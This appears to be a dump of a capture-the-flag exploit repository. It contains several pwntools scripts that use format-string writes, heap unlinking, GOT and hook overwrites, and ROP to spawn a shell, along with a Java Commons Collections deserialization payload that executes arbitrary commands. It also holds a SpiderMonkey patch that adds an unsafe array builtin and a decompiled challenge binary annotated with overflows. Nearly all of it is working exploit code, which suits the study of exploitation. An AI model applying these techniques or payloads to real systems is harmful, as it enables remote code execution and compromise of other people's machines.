obj.as().setLength(cx, 420); 40 | + 41 | + args.rval().setObject(*obj); 42 | + return true; 43 | +} 44 | + 45 | + 46 | // ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce 47 | // 22.1.3.21 Array.prototype.reverse ( ) 48 | bool 49 | @@ -3511,6 +3542,8 @@ 50 | JS_FN("unshift", array_unshift, 1,0), 51 | JS_FNINFO("splice", array_splice, &array_splice_info, 2,0), 52 | 53 | + JS_FN("blaze", array_blaze, 0,0), 54 | + 55 | /* Pythonic sequence methods. */ 56 | JS_SELF_HOSTED_FN("concat", "ArrayConcat", 1,0), 57 | JS_INLINABLE_FN("slice", array_slice, 2,0, ArraySlice), 58 | diff -r ee6283795f41 js/src/builtin/Array.h 59 | --- a/js/src/builtin/Array.h Sat Apr 07 00:55:15 2018 +0300 60 | +++ b/js/src/builtin/Array.h Sun Apr 08 00:01:23 2018 +0000 61 | @@ -166,6 +166,9 @@ 62 | array_reverse(JSContext* cx, unsigned argc, js::Value* vp); 63 | 64 | extern bool 65 | +array_blaze(JSContext* cx, unsigned argc, js::Value* vp); 66 | + 67 | +extern bool 68 | array_splice(JSContext* cx, unsigned argc, js::Value* vp); 69 | 70 | extern const JSJitInfo array_splice_info; 71 | diff -r ee6283795f41 js/src/vm/ArrayObject.h 72 | --- a/js/src/vm/ArrayObject.h Sat Apr 07 00:55:15 2018 +0300 73 | +++ b/js/src/vm/ArrayObject.h Sun Apr 08 00:01:23 2018 +0000 74 | @@ -60,6 +60,14 @@ 75 | getElementsHeader()->length = length; 76 | } 77 | 78 | + void setCapacityInt32(uint32_t length) { 79 | + getElementsHeader()->capacity = length; 80 | + } 81 | + 82 | + void setInitializedLengthInt32(uint32_t length) { 83 | + getElementsHeader()->initializedLength = length; 84 | + } 85 | + 86 | // Make an array object with the specified initial state. 87 | static inline ArrayObject* 88 | createArray(JSContext* cx, -------------------------------------------------------------------------------- /hacklu-2015/bookstore/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./bookstore" 7 | bin = ELF(file) 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | 10 | conn = process(file) 11 | #gdb.attach(conn) 12 | 13 | def menu(choice, ch=None): 14 | conn.recvuntil("Submit\n") 15 | if ch is None: 16 | conn.sendline(str(choice)) 17 | else: 18 | conn.sendline(ch) 19 | 20 | def edit(num, content): 21 | menu(num) 22 | conn.recvuntil("order:") 23 | conn.sendline(content) 24 | 25 | def delete(num): 26 | menu(num+2) 27 | 28 | def submit(ch=None): 29 | menu(5, ch=ch) 30 | 31 | FINI_ARRAY_ADDR = 0x6011B8 32 | MAIN_OFFSET = 0xA39 33 | 34 | c1 = "%" + str(0x39 - (0x45 - 0x39)) + "c%13$hhn" + \ 35 | "%" + str(0xa - 0x39 + 0x100) + "c%14$hhn-dddd%31$p-%33$p-" 36 | c1 = c1.ljust(0x80, "c") 37 | c2 = ("b"*0x20).ljust(0x140, "\x00") 38 | 39 | payload = c1 + p64(0x0) + p64(0x151) + \ 40 | c2 + \ 41 | p64(0x0) + p64(0x21) + "c"*0x10 + p64(0) + p64(0x31) 42 | edit(1, payload) 43 | delete(2) 44 | 45 | stack_payload = "5"*8 + p64(FINI_ARRAY_ADDR) + p64(FINI_ARRAY_ADDR+1) 46 | submit(ch=stack_payload) 47 | 48 | conn.recvuntil("dddd0x") 49 | 50 | libc_leak = int(conn.recvuntil("-")[:-1], 16) 51 | libc.address = libc_leak - 0x7f0ae6145830 + 0x7f0ae6125000 52 | 53 | stack_leak = int(conn.recvuntil("-")[2:-1], 16) 54 | log.info("Stack leak: " + hex(stack_leak)) 55 | 56 | log.info("Libc address: " + hex(libc.address)) 57 | 58 | # Do everything once again 59 | 60 | ROP_CHAIN_ADDR = stack_leak - 0x7ffd7f152bc8 + 0x7ffd7f1529d8 61 | ONE_GADGET_ADDR = libc.address + 0x4526a 62 | STACK_CLEAR_ADDR = stack_leak - 0x7ffd24208538 + 0x7ffd24208380 63 | 64 | words = [None]*4 65 | words[0] = ONE_GADGET_ADDR % 0x10000 66 | words[1] = (ONE_GADGET_ADDR / 0x10000) % 0x10000 67 | words[2] = (ONE_GADGET_ADDR / 0x100000000) % 0x10000 68 | words[3] = (ONE_GADGET_ADDR / 0x10000000000) % 0x10000 69 | 70 | def fix(param): 71 | log.info(param) 72 | if param < 0: 73 | return str(param + 0x10000) 74 | return str(param) 75 | 76 | c1 = "%" + fix(words[0] - (0x45 - 0x39)) + "c%13$hn" + \ 77 | "%" + fix(words[1] - words[0]) + "c%14$hn" + \ 78 | "%" + fix(words[2] - words[1]) + "c%15$hn" + \ 79 | "%" + fix(0 - words[2]) + "c%16$hn%17$hn%18$hn" 80 | 81 | c1 = c1.ljust(0x80, "c") 82 | c2 = ("b"*0x110 + p64(0) + p64(0x12401)).ljust(0x140, "\x00") 83 | 84 | payload = c1 + p64(0x0) + p64(0x151) + \ 85 | c2 + \ 86 | p64(0x0) + p64(0x21) + "c"*0x10 + p64(0) + p64(0x31) 87 | edit(1, payload) 88 | delete(2) 89 | 90 | stack_payload = "5"*8 + p64(ROP_CHAIN_ADDR) + p64(ROP_CHAIN_ADDR + 2) + \ 91 | p64(ROP_CHAIN_ADDR + 4) + \ 92 | p64(STACK_CLEAR_ADDR) + p64(STACK_CLEAR_ADDR + 2) + \ 93 | p64(STACK_CLEAR_ADDR + 4) 94 | 95 | submit(ch=stack_payload) 96 | 97 | log.info("one_gadget: " + hex(ONE_GADGET_ADDR)) 98 | 99 | conn.interactive() 100 | -------------------------------------------------------------------------------- /whitehat-grandpix-2018/book-store/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | from pwn import * 4 | 5 | #context.log_level = 'debug' 6 | context.terminal = ['tmux', 'splitw', '-h'] 7 | 8 | file = "./BookStore" 9 | bin = ELF(file) 10 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 11 | #libc = ELF("./libc.so.6") 12 | 13 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 14 | 15 | conn = process(file) 16 | #gdb.attach(conn) 17 | 18 | def menu(ch): 19 | conn.recvuntil("Your choice") 20 | conn.sendline(str(ch)) 21 | 22 | """ 23 | 00000000 book struc ; (sizeof=0x3A, mappedto_6) 24 | 00000000 next dq ? ; offset 25 | 00000008 brief_ptr dq ? ; offset 26 | 00000010 title db 32 dup(?) 27 | 00000030 ref_idx db ? 28 | 00000031 references_to db ? 29 | 00000032 format_func dq ? 30 | 0000003A book ends 31 | """ 32 | 33 | def add(title, b_len, brief, ref_title, best_selling=False): 34 | menu(1) 35 | conn.recvuntil("Title") 36 | conn.send(title) 37 | conn.recvuntil("brief size") 38 | conn.sendline(str(b_len)) 39 | conn.recvuntil("brief") 40 | conn.send(brief) 41 | conn.recvuntil("book title") 42 | conn.send(ref_title) 43 | conn.recvuntil("Best Selling?") 44 | if best_selling: 45 | conn.sendline("y") 46 | else: 47 | conn.sendline("n") 48 | 49 | def edit(old_title, new_title, b_len, brief, best_selling=False): 50 | menu(2) 51 | conn.recvuntil("Old title") 52 | conn.send(old_title) 53 | conn.recvuntil("title") 54 | conn.send(new_title) 55 | conn.recvuntil("brief size") 56 | conn.sendline(str(b_len)) 57 | conn.recvuntil("brief") 58 | conn.send(brief) 59 | conn.recvuntil("Best Selling?") 60 | if best_selling: 61 | conn.sendline("y") 62 | else: 63 | conn.sendline("n") 64 | 65 | def remove(title): 66 | menu(3) 67 | conn.recvuntil("Title") 68 | conn.send(title) 69 | 70 | def list(): 71 | menu(4) 72 | 73 | # Leaking libc 74 | add("title0\n", 0x50, "brief0\n", "\n") 75 | add("title1\n", 0x50, "brief1\n", "\n", best_selling=True) 76 | for i in range(0xff): 77 | add("title-"+str(i)+"\n", 0x50, "brief.\n", "title1\n", best_selling=False) 78 | 79 | add("title3\n", 0x50, "brief3\n", "\n", best_selling=True) 80 | remove("title0\n") 81 | 82 | payload = p64(0) + p64(bin.got['puts']) + "a"*0x20 + "bb" + \ 83 | p64(bin.symbols['strdup']) 84 | payload = payload.ljust(0x47, "a") 85 | add("title0\n", 0x47, payload, "\n") 86 | list() 87 | conn.recvuntil("a"*0x20) 88 | conn.recvuntil("|") 89 | 90 | puts_addr = u64(conn.recvn(6) + "\x00\x00") 91 | libc.address = puts_addr - libc.symbols['puts'] 92 | 93 | payload = p64(0) + p64(next(libc.search("/bin/sh"))) + "a"*0x20 + "bb" + \ 94 | p64(libc.symbols['system']) 95 | payload = payload.ljust(0x47, "a") 96 | edit("title0\n", "title0\n", 0x47, payload, "\n") 97 | 98 | list() 99 | 100 | log.info("Puts addr: " + hex(puts_addr)) 101 | 102 | conn.interactive() 103 | -------------------------------------------------------------------------------- /hacklu-2017/HeapsOfPrint/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./HeapsOfPrint" 7 | libc = ELF("libc.so.6") 8 | 9 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 10 | 11 | #conn = remote("flatearth.fluxfingers.net", 1747) 12 | conn = process(file, env=env) 13 | #gdb.attach(conn, """ 14 | #break *do_that + 51 15 | #""") 16 | 17 | def write_first(suffix): 18 | conn.recvuntil("character is ") 19 | stack_off = ord(conn.recvn(1)) - 0x17 20 | off_2 = 0xb3 - stack_off - 8 - 2 21 | if off_2 < 0: 22 | off_2 += 0x100 23 | fmt = "%1c"*4 \ 24 | + "%" + str(stack_off + 8 - 4) + "c%hhn" \ 25 | + "%1c"*2 \ 26 | + "%" + str(off_2) + "c%hhn" \ 27 | + suffix 28 | conn.sendline(fmt) 29 | 30 | def write(data, offset, rbp_off, g): 31 | conn.recvuntil("character is ") 32 | off_2 = 0xb3 - rbp_off - 2 + 0x10000 33 | fmt = "%1c"*4 \ 34 | + "%" + str(rbp_off - 4) + "c%hn" \ 35 | + "%1c"*2 \ 36 | + "%" + str(off_2) + "c%hhn" 37 | off_3 = offset - 0xb3 - 5 - 3*g 38 | fmt += "%1c"*(5 + 3*g) \ 39 | + "%" + str(off_3) + "c%hn" 40 | off_4 = data - offset - 29 41 | if off_4 < 0: 42 | off_4 += 0x10000 43 | fmt += "%1c"*(29) \ 44 | + "%" + str(off_4) + "c%hn" 45 | conn.sendline(fmt) 46 | 47 | def write_payload(payload, offset, rbp_off): 48 | i = 0 49 | while len(payload) != 0: 50 | data = payload[0:2] 51 | write(int(data[::-1].encode('hex'), 16), (offset + i*2), rbp_off - 3*8 - 3*8*(i+1), i) 52 | i += 1 53 | payload = payload[2:] 54 | 55 | write_first( 56 | suffix = "aaaa%12$p" \ 57 | + "bbbb%6$p" \ 58 | + "cccc%17$p" \ 59 | + "dddd") 60 | 61 | conn.recvuntil("aaaa") 62 | 63 | prog_base = u64(("\x00\x00" + conn.recvuntil("bbbb")[2:-4].decode('hex'))[::-1]) - 0x990 64 | 65 | rbp = u64(("\x00\x00" + conn.recvuntil("cccc")[2:-4].decode('hex'))[::-1]) 66 | rbp_off = rbp % 0x10000 67 | 68 | system_addr = u64(("\x00\x00" + conn.recvuntil("dddd")[2:-4].decode('hex'))[::-1]) \ 69 | + 0x78390 - 0x53830 70 | bin_sh_addr = system_addr + next(libc.search("/bin/sh")) - libc.symbols['system'] 71 | 72 | offset = (rbp & 0xffff) + 0x150 73 | 74 | pop_rdi_addr = prog_base + 0x009f3 75 | 76 | payload = p64(pop_rdi_addr) \ 77 | + p64(bin_sh_addr) \ 78 | + p64(system_addr) 79 | 80 | write_payload(payload, offset, rbp_off) 81 | 82 | # Now updating ebp to point to our offset 83 | 84 | conn.recvuntil("character is") 85 | 86 | off = rbp_off + 0x3208 - 0x3360 87 | 88 | # Return to main 89 | main_addr = prog_base + 0x906 90 | 91 | off2 = main_addr % 0x10000 - off - 8 - 2 92 | if off2 < 0: 93 | off2 += 0x10000 94 | 95 | fmt = "%1c"*4 \ 96 | + "%" + str(off + 8 - 4) + "c%hn" \ 97 | + "%1c"*2 \ 98 | + "%" + str(off2) + "c%hn" 99 | 100 | conn.sendline(fmt) 101 | 102 | # Now modify rbp 103 | fmt = "%" + str(offset - 8) + "c%6$hn" 104 | 105 | conn.sendline(fmt) 106 | 107 | conn.interactive() 108 | -------------------------------------------------------------------------------- /insomni-hack-17/wheelofrobots/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./wheelofrobots" 7 | 8 | bin = ELF(file) 9 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 10 | 11 | conn = process(file) 12 | #gdb.attach(conn) 13 | 14 | def menu(choice): 15 | conn.recvuntil("Start the Wheel") 16 | conn.recvuntil("choice :") 17 | conn.send(str(choice)) 18 | 19 | def a(robo_type, param=None): 20 | menu(1) 21 | conn.recvuntil("choice :") 22 | if type(robo_type) == type(1): 23 | conn.send(str(robo_type)) 24 | else: 25 | conn.send(robo_type) 26 | if param is not None: 27 | conn.recvuntil("Increase") 28 | conn.send(str(param)) 29 | 30 | def d(robo_type): 31 | menu(2) 32 | conn.recvuntil("choice :") 33 | conn.send(str(robo_type)) 34 | 35 | def c(robo_type, name): 36 | menu(3) 37 | conn.recvuntil("choice :") 38 | conn.send(str(robo_type)) 39 | conn.recvuntil("name: ") 40 | conn.send(name) 41 | 42 | def s(): 43 | menu(4) 44 | 45 | # Unlink exploit - pointers in global memory 46 | 47 | a(2, 2) # malloc(0x28) 48 | a(3, 8) # malloc(160) 49 | d(2) # Goes into fastbin 50 | 51 | # malloc_consolidate -> fast chunk goes into smallbin, prev_in_use cleared 52 | # Also set flag for robo2 as set 53 | a("4aaaa1") 54 | 55 | d(4) 56 | 57 | # Now we can create a fake chunk inside robot 2 58 | 59 | robo2_addr = 0x06030F0 60 | 61 | payload = p64(0) + \ 62 | p64(0x20) + \ 63 | p64(robo2_addr - 8*3) + \ 64 | p64(robo2_addr - 8*2) + \ 65 | p64(0x20) 66 | c(2, payload) 67 | 68 | # Freeing 3rd robo -> unlink 69 | d(3) 70 | 71 | # robo2 now points to robo2_addr - 3*8 ! 72 | 73 | # robo4 will be used for arbitrary read and write 74 | a(4) 75 | 76 | def a_write(addr, value): 77 | # First allocate robo4 78 | payload = p64(0) + \ 79 | p64(addr) 80 | c(2, payload) 81 | c(4, value) 82 | 83 | # Preparing for a_read 84 | # Overwrite exit's got with 'ret' gadget 85 | # Setting robo count > 2 86 | ret_gadget = 0x40162D 87 | robo_count_addr = 0x603130 88 | a_write(bin.got['exit'], p64(ret_gadget)) 89 | a_write(robo_count_addr, p64(3)) 90 | 91 | def a_read(addr): 92 | # Trying to read robo 4 93 | payload = p64(0) + \ 94 | p64(addr) 95 | c(2, payload) 96 | data = "" 97 | while data == "": 98 | s() 99 | l = conn.recvline() 100 | if "( )" in l: 101 | continue # robo 2 was read 102 | if "/\\ ____________________________ /\\" in l: 103 | continue # after 4 was read 104 | conn.recvuntil("Thx ") 105 | data = conn.recvuntil("!")[:-1] 106 | if "(null)" in data: 107 | data = "" # robo 1 was read 108 | return data 109 | 110 | puts_addr = u64(a_read(bin.got['puts']) + "\x00\x00") 111 | 112 | system_addr = libc.symbols['system'] - libc.symbols['puts'] + puts_addr 113 | 114 | a_write(bin.got['free'], p64(system_addr)) 115 | 116 | c(2, "/bin/sh\x00") 117 | d(2) 118 | 119 | conn.interactive() 120 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/MyExploit.java: -------------------------------------------------------------------------------- 1 | package ch.scrt; 2 | 3 | import java.net.InetAddress; 4 | import java.rmi.registry.LocateRegistry; 5 | import java.rmi.registry.Registry; 6 | import java.util.Arrays; 7 | import java.util.HashMap; 8 | import java.util.Map; 9 | import java.util.Objects; 10 | import java.util.Scanner; 11 | 12 | import org.apache.commons.collections.Transformer; 13 | import org.apache.commons.collections.bag.HashBag; 14 | import org.apache.commons.collections.functors.ChainedTransformer; 15 | import org.apache.commons.collections.functors.ConstantTransformer; 16 | import org.apache.commons.collections.functors.InvokerTransformer; 17 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 18 | import org.apache.commons.collections.map.LazyMap; 19 | import org.mockito.internal.util.reflection.Whitebox; 20 | 21 | import ch.scrt.model.Hat; 22 | 23 | public class MyExploit { 24 | public static void main(String[] args) throws Exception { 25 | System.setProperty( 26 | "org.apache.commons.collections.enableUnsafeSerialization", 27 | "true"); 28 | Registry registry = LocateRegistry.getRegistry( 29 | InetAddress.getByName("localhost").getHostName(), 30 | 2020); 31 | WizardAPI wizard = (WizardAPI)registry.lookup("Wizard"); 32 | Scanner in = new Scanner(System.in); 33 | while(true) { 34 | System.out.print("$ "); 35 | String command = in.nextLine(); 36 | try { 37 | System.out.println(wizard.castASpell(generatePayload(command))); 38 | } catch (Exception e) { 39 | System.out.println("Exception: " + e); 40 | } 41 | } 42 | } 43 | @SuppressWarnings("rawtypes") 44 | public static Hat generatePayload(String command) throws Exception { 45 | /* Transformer for Runtime.getRuntime().exec(command) */ 46 | String[] execArgs = new String[]{command}; 47 | Transformer[] transformers = new Transformer[] { 48 | new ConstantTransformer(Runtime.class), 49 | new InvokerTransformer("getMethod", 50 | new Class[] { String.class, Class[].class }, 51 | new Object[] {"getRuntime", new Class[0] }), 52 | new InvokerTransformer("invoke", 53 | new Class[] { Object.class, Object[].class }, 54 | new Object[] { null, new Object[0] }), 55 | new InvokerTransformer("exec", 56 | new Class[] { String.class }, 57 | new String[] { command }), 58 | new ConstantTransformer(1) 59 | }; 60 | /* Chaining all these */ 61 | Transformer chainedTransformer = new ChainedTransformer(transformers); 62 | Map map = new HashMap(); 63 | Map lazyMap = LazyMap.decorate(map, chainedTransformer); 64 | 65 | TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); 66 | HashBag bagWithExploit = new HashBag(); 67 | bagWithExploit.add(new Object()); 68 | 69 | Map internalMap = (Map) Whitebox.getInternalState(bagWithExploit, "map"); 70 | Object[] nodesArray = (Object[]) Whitebox.getInternalState(internalMap, "table"); 71 | Object node = Arrays.stream(nodesArray) 72 | .filter(Objects::nonNull) 73 | .findFirst() 74 | .orElseThrow(() -> new RuntimeException("this can't happen")); 75 | Whitebox.setInternalState(node, "key", entry); 76 | 77 | Hat hat = new Hat(); 78 | Whitebox.setInternalState(hat, "content", bagWithExploit); 79 | return hat; 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /acebear-2018/easy_heap/exploit.py: -------------------------------------------------------------------------------- 1 | """ 2 | A trivial solution to this exists by using the global 'name' string to do 3 | arbitrary read/write 4 | 5 | However, I tried exploiting the challenge without using the global ptr 6 | 7 | 1. UAF in fastbin leads to fastbin corruption. 8 | 2. Modify fd pointer to point somewhere before an allocated chunk's header 9 | 3. Allocate overlapping chunks -> change a chunk's size > fastbin range 10 | 4. Unsafe unlink (global ptrs present in .bss) 11 | """ 12 | 13 | from pwn import * 14 | 15 | #context.log_level = 'debug' 16 | context.terminal = ['tmux', 'splitw', '-h'] 17 | 18 | file = "./easy_heap" 19 | 20 | bin = ELF(file) 21 | libc = ELF("easyheap_libc.so.6") 22 | 23 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./easyheap_libc.so.6")} 24 | 25 | conn = process(file, env=env) 26 | #gdb.attach(conn) 27 | 28 | def menu(choice): 29 | conn.recvuntil("Your choice: ") 30 | conn.sendline(str(choice)) 31 | 32 | def create(index, name): 33 | menu(1) 34 | conn.recvuntil("Index: ") 35 | conn.sendline(str(index)) 36 | conn.recvuntil("Input this name: ") 37 | conn.send(name) 38 | conn.recvuntil("Done!") 39 | 40 | def edit(index, name): 41 | menu(2) 42 | conn.recvuntil("Index: ") 43 | conn.sendline(str(index)) 44 | conn.recvuntil("Input new name: ") 45 | conn.send(name) 46 | conn.recvuntil("Done!") 47 | 48 | def delete(index): 49 | menu(3) 50 | conn.recvuntil("Index: ") 51 | conn.sendline(str(index)) 52 | conn.recvuntil("Done!") 53 | 54 | def show(index): 55 | menu(4) 56 | conn.recvuntil("Index: ") 57 | conn.sendline(str(index)) 58 | conn.recvuntil("This name") 59 | conn.recvuntil("is: ") 60 | 61 | conn.sendline("vampire") 62 | conn.recvuntil("age") 63 | conn.sendline(str(21)) 64 | 65 | names_addr = 0x0804B0A0 66 | 67 | # Leaking heap address 68 | create(0, "abc") 69 | create(1, "def") 70 | create(2, "ghi") 71 | delete(1) 72 | delete(2) 73 | show(2) 74 | 75 | heap_leak = u32(conn.recvn(4)) 76 | 77 | # Clearing fastbin 78 | create(2, "a") 79 | payload = p32(0) + \ 80 | p32(0xe8) + \ 81 | p32(names_addr + 4 - 3*4) + \ 82 | p32(names_addr + 4 - 2*4) 83 | create(1, payload) 84 | 85 | # Creating size for non fast chunk 86 | 87 | for i in range(3): 88 | create(9, "a") 89 | 90 | create(8, "a") 91 | create(9, "a") 92 | 93 | for i in range(15): 94 | create(6, (p32(0xe8) + p32(0x51))*4) 95 | 96 | # Fastbin corruption 97 | delete(8) 98 | log.info("Heap leak: " + hex(heap_leak)) 99 | edit(8, p32(heap_leak + 0x100 - 0x28 - 0x8) + p32(0x29)) 100 | create(8, "a") 101 | payload = p32(0)*6 + \ 102 | p32(0xe8) + \ 103 | p32(0xe8) 104 | create(7, payload) 105 | 106 | delete(9) 107 | 108 | def a_read(addr): 109 | edit(1, p32(0)*2 + p32(addr)) 110 | show(0) 111 | 112 | def a_write(addr, data): 113 | edit(1, p32(0)*2 + p32(addr)) 114 | edit(0, data) 115 | 116 | a_read(bin.got['atoi']) 117 | atoi_addr = u32(conn.recvn(4)) 118 | libc.address = atoi_addr - libc.symbols['atoi'] 119 | 120 | a_write(bin.got['atoi'], p32(libc.symbols['system'])) 121 | 122 | conn.sendline("/bin/sh") 123 | 124 | log.info("Libc leak: " + hex(atoi_addr)) 125 | log.info("Heap leak: " + hex(heap_leak)) 126 | conn.interactive() 127 | -------------------------------------------------------------------------------- /codegate-2018/zoo/dec.c: -------------------------------------------------------------------------------- 1 | void feed_animal(zoo *z) { 2 | int animal_idx = get_index_by_name(z); 3 | return if animal_idx < 0 || > 4; 4 | a = z->animals[animal_idx]; 5 | int dung_diff = 0; 6 | int feed_idx = a->feed_index; 7 | if (a->feeds[feed_idx]) { 8 | puts("cannot feed more"); 9 | } else { 10 | feed = a->feeds[feed_idx] = malloc(0x80); 11 | memset(feed, 0, 0x80); 12 | if (a->feed_flag_ill) { 13 | feed->str = offset_of_"Medicine"; 14 | feed->w2 = animals[animal_idx + 1]->dung_index2; 15 | read(feed->medicine, 8); 16 | read(feed->med_desc, 120); // Overflow 17 | } else { 18 | feed->str = offset_of_"Food"; 19 | puts("Your animal ate a food"); 20 | } 21 | a->feed_index = (a->feed_index + 1) % 20; 22 | int diff = (a->feed_index - a->feed_index2 + 20) % 20; 23 | if (diff == 0 && a->feed[0]) { 24 | diff = 20; 25 | } 26 | if (!a->feed_flag_ill && diff > 4 && is_odd(diff)) { 27 | int dung_index = a->dung_index; 28 | if (a->dungs[dung_index]) { 29 | puts("Clean dung"); 30 | return; 31 | } 32 | dung = a->dungs[dung_index] = malloc(0x80); 33 | memset(dung, 0, 0x80); 34 | a->dung_index = (a->dung_index + 1) % 25; 35 | dung_diff = (a->dung_index - a->dung_index2 + 25 % 25); 36 | if (dung_diff==0 && a->dungs[0]) { 37 | dung_diff = 20; 38 | } 39 | } 40 | if (dung_duff > 4) { 41 | a->is_ill = 1; 42 | puts("Your animal is ill"); 43 | } 44 | } 45 | } 46 | 47 | void clean_animal(zoo *z) { 48 | animal_idx = get_index_by_name(); 49 | // check animal_idx 50 | int dung_index2 = a->dung_index2; 51 | if (a->dungs[dung_index2]) { 52 | free(a->dungs[dung_index2]); 53 | a->dungs[dung_index2] = 0; 54 | a->dungs_index2 = (a->dungs_index2 + 1) % 25; 55 | if (dung_diff==0) { 56 | dung_diff = 20; 57 | } 58 | printf("Good job"); 59 | } else { 60 | puts("You don't have to clean dung"); 61 | } 62 | } 63 | 64 | void walk(zoo *z) { 65 | get_index_by_name(); 66 | // check animal index 67 | int feed_index2 = a->feed_index2; 68 | if (a->feeds[feed_index2]) { 69 | free(a->feeds[feed_index2]); 70 | a->feeds[feed_index2] = 0; 71 | // increment feed_index2 72 | if (feed_diff==0) { 73 | feed_diff = 20; 74 | } 75 | if (++a->likes > 14) { 76 | for(int i = 0;i<=19;i++) { 77 | if (a->feeds[i] && 78 | a->feeds[i]->str != "Medicine" || "Food") { // offset 79 | puts("Animal is happy\n"); 80 | read(0, a->feeds[i]->medicine_desc, 120); // overflow 81 | } 82 | } 83 | } 84 | } else { 85 | puts("doesn't need walk"); 86 | } 87 | } 88 | 89 | void take_hospital(zoo *z) { 90 | // get and check index 91 | if (a->is_ill) { 92 | for(int i = 0;i<4;i++) { 93 | int dung_index2 = a->dung_index2; 94 | if (!a->dungs[dung_index2]) { 95 | break; 96 | } 97 | free(a->dungs[dung_index2]); 98 | a->dungs[dung_index2] = 0; 99 | // increment dung_index2 100 | } 101 | int dung_diff; 102 | if (dung_diff==0 && a->dungs[0]) { 103 | dung_diff = 20; 104 | } 105 | if (dung_diff > 4) { 106 | a->feed_flag_ill = 1; 107 | printf("take medicine\n"); 108 | } else { 109 | a->is_ill = 0; 110 | } 111 | } else { 112 | puts("Not ill"); 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /advent-2021/santazon/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./santazon" 7 | bin = ELF(file) 8 | libc = ELF("./libc.so.6") 9 | 10 | #conn = process(file) 11 | conn = remote("santazon.advent2021.overthewire.org", 1210) 12 | 13 | def menu(choice): 14 | conn.recvuntil("mnput") 15 | conn.sendline(choice) 16 | 17 | def gift(s): 18 | menu("gift") 19 | conn.recvuntil("gift") 20 | conn.send(s) 21 | 22 | def wrap(idx, s): 23 | menu("wrap") 24 | conn.recvuntil("mndex") 25 | conn.sendline(str(idx)) 26 | conn.recvuntil("gift") 27 | conn.send(s) 28 | 29 | def return_gift(idx): 30 | menu("return") 31 | conn.recvuntil("mndex") 32 | conn.sendline(str(idx)) 33 | 34 | def open(idx): 35 | menu("open") 36 | conn.recvuntil("mndex") 37 | conn.sendline(str(idx)) 38 | 39 | def leak_from_stack(count): 40 | payload = "a"*count 41 | wrap(0, payload) 42 | open(0) 43 | conn.recvuntil(payload) 44 | return u64(conn.recvline()[:-1].ljust(0x8, "\x00")) 45 | 46 | """ 47 | 0x7ffcd8649628: 0x0000560061616161 0x0000000000000d68 48 | [libc] 49 | 0x7ffcd8649638: 0x00007ff79df59ad1 0x00007ff79e0b26a0 50 | 0x7ffcd8649648: 0x00007ff79e0b26a0 0x00007ff79e0b34a0 51 | [bin] [stack] 52 | 0x7ffcd8649658: 0x0000564a08cff1c0 0x00007ffcd8649800 53 | 0x7ffcd8649668: 0x0000000000000000 0x0000000000000000 54 | 0x7ffcd8649678: 0x00007ff79df575f8 0x0000564a08d00008 55 | 0x7ffcd8649688: 0x00007ff79e0b26a0 0x00007ff79e0b34a0 56 | 0x7ffcd8649698: 0x0000564a08cff2f8 0x0000000000000010 57 | """ 58 | 59 | libc_leak = leak_from_stack(0x8*2) 60 | libc_base = libc_leak - 0x7f17b8456ad1 + 0x7f17b83c3000 61 | libc.address = libc_base 62 | 63 | # Put chunks in tcache 64 | gift("b"*0x57) 65 | wrap(1, "\n") # Frees the chunk 66 | return_gift(0) 67 | return_gift(1) 68 | wrap(0, "c"*0x30) 69 | wrap(1, "c"*0x30) 70 | wrap(1, "\n") 71 | wrap(0, "\n") 72 | 73 | """ 74 | Allocated chunk | PREV_INUSE 75 | Addr: 0x555db4489000 76 | Size: 0x291 77 | 78 | Allocated chunk | PREV_INUSE 79 | Addr: 0x555db4489290 80 | Size: 0x411 81 | 82 | Allocated chunk | PREV_INUSE 83 | Addr: 0x555db44896a0 84 | Size: 0x21 85 | 86 | Allocated chunk | PREV_INUSE 87 | Addr: 0x555db44896c0 88 | Size: 0x1011 89 | 90 | Free chunk (tcache) | PREV_INUSE <-- Overflow this chunk 91 | Addr: 0x555db448a6d0 92 | Size: 0x61 93 | fd: 0x00 94 | 95 | Free chunk (tcache) | PREV_INUSE 96 | Addr: 0x555db448a730 97 | Size: 0x41 98 | fd: 0x555db448a780 <-- Overwrite this fd pointer 99 | 100 | Free chunk (tcache) | PREV_INUSE 101 | Addr: 0x555db448a770 102 | Size: 0x41 103 | fd: 0x00 104 | 105 | Top chunk | PREV_INUSE 106 | Addr: 0x555db448a7b0 107 | Size: 0x1f851 108 | """ 109 | 110 | # Clear pointers, so we do fresh allocations 111 | return_gift(0) 112 | return_gift(1) 113 | payload = "e"*0x60 + p64(libc.symbols['__realloc_hook']) 114 | wrap(0, payload.ljust(120, "\x00")) # Fill stack with our payload 115 | wrap(1, "f"*0x58) 116 | 117 | # Try to get an allocation on realloc 118 | return_gift(0) 119 | return_gift(1) 120 | wrap(0, "/bin/sh".ljust(0x37, "\x00")) 121 | 122 | log.info("System: " + hex(libc.symbols['system'])) 123 | wrap(1, p64(libc.symbols['system']).ljust(0x36, "\x00")) # Overwrite realloc hook 124 | wrap(0, "h"*0x34) # Trigger shell! 125 | 126 | log.info("Libc leak: " + hex(libc_leak)) 127 | 128 | # AOTW{m0_pr3s3ntz_m0_pr0bl3mz} 129 | 130 | conn.interactive() 131 | -------------------------------------------------------------------------------- /seccon-2017/election-200/exploit.py: 